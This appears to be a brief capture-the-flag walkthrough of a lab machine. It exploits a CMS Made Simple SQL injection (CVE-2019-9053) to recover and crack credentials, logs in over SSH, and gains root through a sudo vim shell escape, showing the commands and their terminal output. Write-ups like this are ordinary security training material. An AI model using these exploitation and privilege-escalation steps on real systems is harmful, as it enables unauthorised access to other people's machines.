Skip to main content

Simple CTF

CMS Made Simple [CVE-2019-9053]

Used Exploit: EDB-ID: 46635
We were able to Brute-Force the Username:Password using the Automated Exploit.
mitch : secret

[+] Salt for Password Found: 1dac0d92e9fa6bb2
[+] Username Found: mitch
[+] Email Found: admin@admin.com
[+] Password Found: 0c01f4468bd75d7a84c7eb73846e8d96
[+] Password Cracked: secret

Privilege Escalation

PORT - 2222
Using SSH Credentials to Login: mitch:secret

mitch@Machine:~$ id
uid=1001(mitch) gid=1001(mitch) groups=1001(mitch)

The User mitch can run: /usr/bin/vim as ROOT
We can Escape into a Shell from vim by typing !sh or we can do that directly with sudo vim -c ':!/bin/sh'

mitch@Machine:~$ sudo -l
User mitch may run the following commands on Machine:
    (root) NOPASSWD: /usr/bin/vim
mitch@Machine:~$ sudo /usr/bin/vim

root@Machine:~$ id
uid=0(root) gid=0(root) groups=0(root)
root@Machine:~$ whoami
root

CMS Made Simple [CVE-2019-9053]
Privilege Escalation